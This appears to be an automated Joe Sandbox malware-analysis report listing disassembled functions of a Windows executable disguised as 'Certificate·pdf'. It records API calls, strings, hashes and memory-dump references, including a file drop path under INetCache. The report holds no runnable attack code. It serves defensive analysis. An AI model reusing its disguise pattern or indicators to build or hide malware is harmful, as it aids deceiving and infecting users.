Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: 4c7fd7b1f91375a2558ff4a0a047554b9ac13023ec1a621a7b7447f5a49afdce
Instruction ID: 9b62f472eb3a95df078ad497759be9c31f6c15c11f60cf08f6005a6c9cb4e6e4
Opcode Fuzzy Hash: 4c7fd7b1f91375a2558ff4a0a047554b9ac13023ec1a621a7b7447f5a49afdce
Instruction Fuzzy Hash: 9921BFB1C00128BBCF116FA5DE49D9E7E79EF09364F14423AF960762E0CB794C419B98

Function 004057CE Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(?,?,00000000), ref: 00405811
GetLastError.KERNEL32 ref: 00405825
SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040583A
GetLastError.KERNEL32 ref: 00405844

Strings

C:\Users\user\Desktop, xrefs: 004057CE

Memory Dump Source

Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user\Desktop
API String ID: 3449924974-3370423016
Opcode ID: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
Instruction ID: 32cc50e607dd20b61f2ed470817bc290d965520901a5db6b5155953f1fdd03ed
Opcode Fuzzy Hash: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
Instruction Fuzzy Hash: B1010872C10619DADF00AFA1C9447EFBBB8EF14355F00803AD945B6281E77896188FA9

Function 00401DB9 Relevance: 7.5, APIs: 5, Instructions: 43COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401DBC
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
ReleaseDC.USER32(?,00000000), ref: 00401DEF
CreateFontIndirectW.GDI32(0040CDA8), ref: 00401E3E

Memory Dump Source

Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID:
API String ID: 3808545654-0
Opcode ID: 5bd6bd5a0da59a8b862859853f94caf732d3d6ef064c8fd9610db6583930af4a
Instruction ID: 8812a6a15301a194985102fbed33e50eefbd915e65da34b8167a76c641a3bf07
Opcode Fuzzy Hash: 5bd6bd5a0da59a8b862859853f94caf732d3d6ef064c8fd9610db6583930af4a
Instruction Fuzzy Hash: 1B017571948240EFE7406BB4AF8A7D97FB49F95301F10457EE241B71E2CA7804459F2D

Function 00401D5D Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00401D63
GetClientRect.USER32(00000000,?), ref: 00401D70
LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
DeleteObject.GDI32(00000000), ref: 00401DAE

Memory Dump Source

Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: af37ea9ba388a84de559cbd8ec297e57ada735495d371533b97794bde5efee3a
Instruction ID: 7e4da700d615158f321032e6dee441e0afa22e46251462cde10931eea5e4b44d
Opcode Fuzzy Hash: af37ea9ba388a84de559cbd8ec297e57ada735495d371533b97794bde5efee3a
Instruction Fuzzy Hash: 59F0EC72A04518AFDB41DBE4DE88CEEB7BCEB48301B14446AF641F61A0CA749D519B38

Function 00401C1F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7

Strings

!, xrefs: 00401C5B

Memory Dump Source

Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 3974eff3514ac80dd6c1aa8123252385dbc5481e5078a21275b56949e15273d0
Instruction ID: 5915ba61491c244e76e1eaab0aa102c6a5e0f3d841db56a12d121f6c77e1b82d
Opcode Fuzzy Hash: 3974eff3514ac80dd6c1aa8123252385dbc5481e5078a21275b56949e15273d0
Instruction Fuzzy Hash: E621C371948209AEEF049FB5DE4AABE7BB4EF84304F14443EF605F61D0D7B889409B18

Function 00404ABB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(007A1F20,007A1F20,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B5C
wsprintfW.USER32 ref: 00404B65
SetDlgItemTextW.USER32(?,007A1F20), ref: 00404B78

Strings

%u.%u%s%s, xrefs: 00404B46

Memory Dump Source

Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: e544acf4f0842c60a9c18385703c419e840f736fd1e164df9e130a51ba0441a7
Instruction ID: c6a8333de7f2a0e63f9e82a7fb0d3590b97a2c0368f8d4fe0eecd184368e2ceb
Opcode Fuzzy Hash: e544acf4f0842c60a9c18385703c419e840f736fd1e164df9e130a51ba0441a7
Instruction Fuzzy Hash: 5711DB736041282BDB00656D9C41F9E329CDB86334F15423BFB25F21D1D978DC1186E8

Function 00402598 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69stringCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(?,?,0040B5A8,000000FF,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Penetrometer\Transiter\Salenes\Tilrakket.Ove,00000400,?,?,00000021), ref: 004025E8
lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Penetrometer\Transiter\Salenes\Tilrakket.Ove,?,?,0040B5A8,000000FF,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Penetrometer\Transiter\Salenes\Tilrakket.Ove,00000400,?,?,00000021), ref: 004025F3

Strings

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Penetrometer\Transiter\Salenes\Tilrakket.Ove, xrefs: 004025B3, 004025DA, 004025EE, 0040263A

Memory Dump Source

Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd

Similarity

API ID: ByteCharMultiWidelstrlen
String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Penetrometer\Transiter\Salenes\Tilrakket.Ove
API String ID: 3109718747-3189326397
Opcode ID: bac47df6fb5c15672e847bcd90d072063b8e9d74f7c5b2892f2d21255f34aeb3
Instruction ID: 4bb1670e371a3de23f361dcee459543bcfcf4636ee0f51b5b5a9e7d0ab821041
Opcode Fuzzy Hash: bac47df6fb5c15672e847bcd90d072063b8e9d74f7c5b2892f2d21255f34aeb3
Instruction Fuzzy Hash: DB11CB72A05300BEDB046FB18E8999F7664AF54399F20843FF502F61D1D9FC89415B5E

Function 00405B6C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403359,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,77143420,004035B6,?,00000006,00000008,0000000A), ref: 00405B72
CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403359,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,77143420,004035B6,?,00000006,00000008,0000000A), ref: 00405B7C
lstrcatW.KERNEL32(?,0040A014), ref: 00405B8E

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405B6C

Memory Dump Source

Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-3355392842
Opcode ID: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
Instruction ID: 803477e47080facc391f0cecd2807ccdb00b9d1fdb40608b9d44cb66137c19bb
Opcode Fuzzy Hash: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
Instruction Fuzzy Hash: 3BD0A731501A30AAC111BB449D04DDF72ACDE45304342047FF101B31A2C7BC2D5287FD

Function 00402D44 Relevance: 6.1, APIs: 4, Instructions: 63registryCOMMON

Download Yara Rule

APIs

RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3

Memory Dump Source

Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd

Similarity

API ID: Close$Enum
String ID:
API String ID: 464197530-0
Opcode ID: a4e23b119c2c64eb18a4fa0724f9b8d9fe0ec592ff9815e45bdb7592abe1cef3
Instruction ID: 4ebe2cb43181949e29f1e9fb79ae388d5d3e17bd3db4e8cfc4c1202d027f6d8e
Opcode Fuzzy Hash: a4e23b119c2c64eb18a4fa0724f9b8d9fe0ec592ff9815e45bdb7592abe1cef3
Instruction Fuzzy Hash: FB116A32500108FBDF02AB90CE49FEE7B7DAF44340F110076B905B51E1E7B59E21AB58

Function 00402E79 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000,00403059,00000001,?,00000006,00000008,0000000A), ref: 00402E8C
GetTickCount.KERNEL32 ref: 00402EAA
CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402EC7
ShowWindow.USER32(00000000,00000005,?,00000006,00000008,0000000A), ref: 00402ED5

Memory Dump Source

Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 642f8ca692fd152fc603be3dcb1ebc0d266b07749ec13cb5d5f59d94c884d359
Instruction ID: b514363a92e965461d88eaa206c20d0702a544c8e4880045d1c7c79aac8a479e
Opcode Fuzzy Hash: 642f8ca692fd152fc603be3dcb1ebc0d266b07749ec13cb5d5f59d94c884d359
Instruction Fuzzy Hash: 3AF05E30966A21EBC6606B24FE8CA8B7B64FB44B01711887BF001B11B4DA7C4892CBDC

Function 004038F2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,77143420,004038CA,004036E0,00000006,?,00000006,00000008,0000000A), ref: 0040390C
GlobalFree.KERNEL32(?), ref: 00403913

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00403904

Memory Dump Source

Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341761650.00000000007CB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Certificate#U00b7pdf.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1100898210-3355392842
Opcode ID: 4b08b810d440714d2b51308f6ef11deb4a674dc1e9eb6c71d827c8d8e3b91fd9
Instruction ID: 827a6d7c30b52d61f5a2dbff04e35f254d4b7381da6d9dc608e34789494937b8
Opcode Fuzzy Hash: 4b08b810d440714d2b51308f6ef11deb4a674dc1e9eb6c71d827c8d8e3b91fd9
Instruction Fuzzy Hash: 58E0CD334010205BC6115F04FE0475A77685F45B22F16003BFC807717147B41C538BC8

Function 00405BB8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(007B6800,C:\Users\user\Desktop,00402F49,C:\Users\user\Desktop,C:\Users\user\Desktop,007B6800,007B6800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BBE
CharPrevW.USER32(007B6800,00000000,007B6800,C:\Users\user\Desktop,00402F49,C:\Users\user\Desktop,C:\Users\user\Desktop,007B6800,007B6800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BCE

Strings

C:\Users\user\Desktop, xrefs: 00405BB8

Memory Dump Source

Source File: 00000000.00000002.23340938665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.23340912487.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23340965335.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.23341017704.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
